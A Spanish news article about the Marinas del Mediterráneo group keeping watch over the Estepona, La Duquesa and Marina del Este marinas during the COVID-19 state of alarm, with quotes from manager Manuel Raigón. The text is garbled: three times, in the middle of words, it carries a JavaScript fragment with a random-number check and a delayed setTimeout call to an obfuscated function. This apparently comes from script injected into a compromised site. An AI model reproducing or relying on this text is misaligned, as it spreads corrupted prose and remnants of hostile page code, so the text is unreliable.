El grupo Marinas del Mediterráneo, en aplicación del Real Decreto-Ley 10/2020, de 29 de marzo, por el que se endurecen las medidas de confinamiento para frenar la expansión del COVID-19, informa de que en los puertos deportivos de Estepona, La Duquesa y Marina del Este se continúa manteniendo el servicio de vigilancia y custodia de las embarcaciones que están en sus atraques, tal y como se venía desarrollandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando desde el inicio del Estado de Alarma decretado por el Gobierno.
Aunque el tráfico náutico deportivo está prohibido, Manuel Raigón, director gerente del grupo, ha indicado que los puertos cuentan con los servicios mínimos necesarios para garantizar el mantenimiento de las instalaciones y de las embarcaciones, así como para cubrir cualquier emergencia que pueda darse como peligro de hundimiento o temporal. Estos servicios mínimos también incluyen la vigilancia de que no haya desplazamientos de personas por las instalaciones.
Lo que sí han quedado paralizadas son las tareas de los varaderos hasta el próximo 9 de abril, salvo nueva indicación por parte de las autoridades.
Raigón ha explicado que se está trabajandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando conjuntamente con el servicio marítimo de la Guardia Civil para seguir el protocolo establecido: comunicarles si llega algún barco con intención de atracar en alguno de los puertos. Y, en este caso, los tripulantes no podrán desembarcar mientras no tengan el permiso de la autoridad competente.
El director gerente de Marinas del Mediterráneo ha destacado la labor que está llevandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando a cabo todo el personal en cada uno de los puertos y ha agradecido su labor, implicación y profesionalidad.